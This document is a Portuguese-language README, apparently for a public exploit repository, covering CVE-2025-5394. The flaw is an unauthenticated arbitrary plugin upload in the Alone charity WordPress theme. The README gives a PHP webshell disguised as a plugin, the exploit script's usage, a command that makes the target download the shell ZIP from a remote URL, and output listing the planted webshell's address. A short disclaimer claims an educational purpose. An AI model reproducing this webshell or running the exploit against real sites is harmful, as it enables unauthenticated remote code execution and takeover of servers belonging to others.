
Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Falta de Autorização para Upload Arbitrário de Arquivos Não Autenticado via Instalação de Plugin
Alone – Tema WordPress Sem Fins Lucrativos e Multifuncional para Caridade Versões: <= 7.8.3 CVE: CVE-2025-5394 Pontuação CVSS: 9.8 (Crítico)
O tema Alone para WordPress é vulnerável a uploads arbitrários de arquivos devido a uma verificação de capacidade ausente na função alone_import_pack_install_plugin().
Essa falha permite que atacantes não autenticados façam upload de arquivos ZIP (disfarçados como plugins) de locais remotos, potencialmente alcançando execução remota de código.
Este repositório contém um script em Python que automatiza a exploração do CVE-2025-5394. O script aciona a ação AJAX vulnerável e faz upload de um plugin falso (contendo um webshell) diretamente para o servidor WordPress.
O arquivo ZIP enviado deve seguir esta estrutura:
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
Onde:
shell_plugin é o diretório do plugin.shell_plugin.php é um arquivo de plugin PHP válido com um cabeçalho de plugin.Exemplo de cabeçalho mínimo de plugin dentro de shell_plugin.php:
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
Este script é fornecido apenas para fins educacionais e de pesquisa. O autor não é responsável por qualquer uso indevido ou atividade ilegal realizada com este código. Use-o apenas em sistemas que você possua ou tenha permissão explícita para testar.
Nxploited ( Khaled Alenazi ) GitHub: https://github.com/Nxploited